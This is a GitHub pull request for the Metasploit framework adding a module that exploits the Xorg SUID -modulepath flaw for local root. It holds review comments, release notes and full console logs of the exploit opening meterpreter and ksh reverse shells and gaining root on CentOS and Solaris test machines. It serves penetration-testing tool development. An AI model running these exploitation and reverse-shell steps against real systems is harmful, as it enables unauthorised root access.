Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

WIP Xorg x11 suid server modulepath #11025

Merged
merged 6 commits into from Oct 22, 2019
Merged

WIP Xorg x11 suid server modulepath #11025

merged 6 commits into from Oct 22, 2019

Conversation

aringo
Copy link
Contributor

@aringo aringo commented Nov 26, 2018
edited

Using this version of the exploit there is no need to overwrite crontab, works against Selinux, and is near instant. I had some difficulties getting this to work on OpenBSD. Should I try to update the other one to use this method for Linux? Kind of burnt out on this exploit now so WIP 馃挴

  • Start msfconsole
  • get session
  • exploit/multi/local/xorg_x11_suid_server_modulepath
Module options (exploit/multi/local/xorg_x11_suid_server_modulepath):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.30.0.2       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x64


msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.30.0.2:4444 
[*] Running additional check for Linux
[+] Console lock for peep
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.5 is vulnerable
[+] Xorg does not appear running
[+] gcc is installed
[+] Passed all initial checks for exploit
[*] Writing launcher
[*] Max line length is 65537
[*] Writing 145 bytes in 1 chunks of 524 bytes (octal-encoded), using printf
[*] compiling launcher
[*] Uploading your payload, this could take a while
[*] Max line length is 65537
[*] Writing 249 bytes in 1 chunks of 728 bytes (octal-encoded), using printf
[*] Exploiting
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (816260 bytes) to 172.30.0.61
[*] Meterpreter session 2 opened (172.30.0.2:4444 -> 172.30.0.61:55866) at 2018-11-25 19:31:39 -0600
[+] Deleted /tmp/CmduZk.c
[+] Deleted /tmp/libglx.so
[+] Deleted /tmp/.session-k0KBlQ1xT

meterpreter > shell 
Process 2299 created.
Channel 1 created.
id ; uname -a ; sestatus
uid=0(root) gid=0(root) groups=0(root),1000(peep) context=unconfined_u:unconfined_r:xserver_t:s0-s0:c0.c1023
Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Fri Apr 20 16:44:24 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
SELinux status:                 enabled
SELinuxfs mount:                /sys/fs/selinux
SELinux root directory:         /etc/selinux
Loaded policy name:             targeted
Current mode:                   enforcing
Mode from config file:          error (Inappropriate ioctl for device)
Policy MLS status:              enabled
Policy deny_unknown status:     allowed
Max kernel policy version:      31

@bcoles bcoles added module blocked Blocked by one or more additional tasks needs-docs labels Nov 26, 2018
@bcoles
Copy link
Contributor

bcoles commented Nov 26, 2018

Have you looked at rapt0r's exploit for this bug on Solaris 11.4 ?

bcoles
bcoles reviewed Nov 26, 2018
View reviewed changes
modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb

# linux checks
uname = cmd_exec "uname"
if uname =~ /linux/i
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This isn't necessary if you're only targeting Linux.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This technique works on Solaris also, I'll open it up. It does not work on OpenBSD though.

modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb Outdated Show resolved Hide resolved
modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb
xdisplay = datastore['Xdisplay']
sofile = "#{modulepath}/#{datastore['sofile']}"

stub = %Q^
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

For Linux, you could use Metasm to dynamically compile the shared object, rather than relying on gcc to be on the box. Here's an example.

modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb Outdated Show resolved Hide resolved
modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb Outdated Show resolved Hide resolved
modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb Show resolved Hide resolved
@aringo aringo mentioned this pull request Mar 29, 2019
Merged
@bcoles
Copy link
Contributor

bcoles commented Apr 21, 2019

Any luck with adding support for Solaris ? There's a few examples of dealing with Solaris' insane $PATH issues for gcc and compiling a shared object in the exploits/solaris/local directory. Alternatively, I can take a look at implementing gcc for Solaris if you like.

Perhaps it would be better to get this landed and circle back later.

Should I try to update the other one to use this method for Linux?

I think it makes sense to keep the two vectors separate. Partly because they're exploited differently, but mostly because the module logic is already complex enough as a multi module.

@space-r7 space-r7 self-assigned this Oct 15, 2019
@space-r7
Copy link
Contributor

Hi @aringo! Do you mind if I try adding a Solaris target to your module? Thanks!

@space-r7
Copy link
Contributor

In the interest of getting this landed soon, I added support for Metasm, Solaris targets, and documentation.

@space-r7 space-r7 added docs and removed needs-docs labels Oct 22, 2019
@space-r7
Copy link
Contributor

Testing on Centos 7.4:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[*] Sending stage (816260 bytes) to 172.16.215.159
[*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.159:33178) at 2019-10-22 13:48:01 -0500

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath 
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 1
session => 1
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check
[+]  The target is vulnerable.
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[+] Passed all initial checks for exploit
[*] Writing launcher and compiling
[*] Uploading your payload, this could take a while
[*] Exploiting
[*] Sending stage (816260 bytes) to 172.16.215.159
[*] Meterpreter session 2 opened (172.16.215.1:4444 -> 172.16.215.159:33180) at 2019-10-22 13:48:51 -0500
[+] Deleted /tmp/libglx.so
[+] Deleted /tmp/.session-qwQLbME

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Testing on Solaris 11.4:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_ksh
payload => cmd/unix/reverse_ksh
msf5 exploit(multi/handler) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[*] Command shell session 1 opened (172.16.215.1:4444 -> 172.16.215.159:33616) at 2019-10-22 14:06:33 -0500
[*] Command shell session 2 opened (172.16.215.1:4444 -> 172.16.215.152:39838) at 2019-10-22 14:06:33 -0500

whoami
space
id 
uid=100(space) gid=10(staff)
uname -a
SunOS solaris 5.11 11.4.0.15.0 i86pc i386 i86pc
background

Background session 2? [y/N]  y
msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath 
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set target 2
target => 2
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 2
session => 2
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload cmd/unix/reverse_ksh
payload => cmd/unix/reverse_ksh
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check

[!] SESSION may not be compatible with this module.
[+]  The target is vulnerable.
msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.215.1:4444 
[+] Passed all initial checks for exploit
[*] Writing launcher and compiling
[*] Uploading your payload, this could take a while
[*] Exploiting
[*] Command shell session 3 opened (172.16.215.1:4444 -> 172.16.215.152:45033) at 2019-10-22 14:07:37 -0500
[+] Deleted /tmp/DhNrDYvoir.c
[+] Deleted /tmp/libglx.so
[+] Deleted /tmp/.session-ZnrESw

id
uid=0(root) gid=0(root)
uname -a
SunOS solaris 5.11 11.4.0.15.0 i86pc i386 i86pc

space-r7 added a commit that referenced this pull request Oct 22, 2019
@space-r7
Land #11025, add Xorg SUID Modulepath Privesc
e8469dc
@space-r7 space-r7 merged commit 1ceaa1d into rapid7:master Oct 22, 2019
msjenkins-r7 pushed a commit that referenced this pull request Oct 22, 2019
@space-r7 @msjenkins-r7
Land #11025, add Xorg SUID Modulepath Privesc
310361d
@space-r7
Copy link
Contributor

Release Notes

This exploits a local privilege escalation vulnerability on targets running Xorg server versions from v1.19.0 to versions below v1.20.3. Vulnerable versions of Xorg have the SUID bit set and allow low-privileged users to start the server with the -modulepath flag. This allows a user to load and execute a shared object as root.

@bcoles bcoles added rn-modules release notes for new or majorly enhanced modules and removed blocked Blocked by one or more additional tasks labels Oct 24, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bcoles bcoles bcoles left review comments

@space-r7 space-r7 space-r7 left review comments

Assignees

@space-r7 space-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@aringo @bcoles @space-r7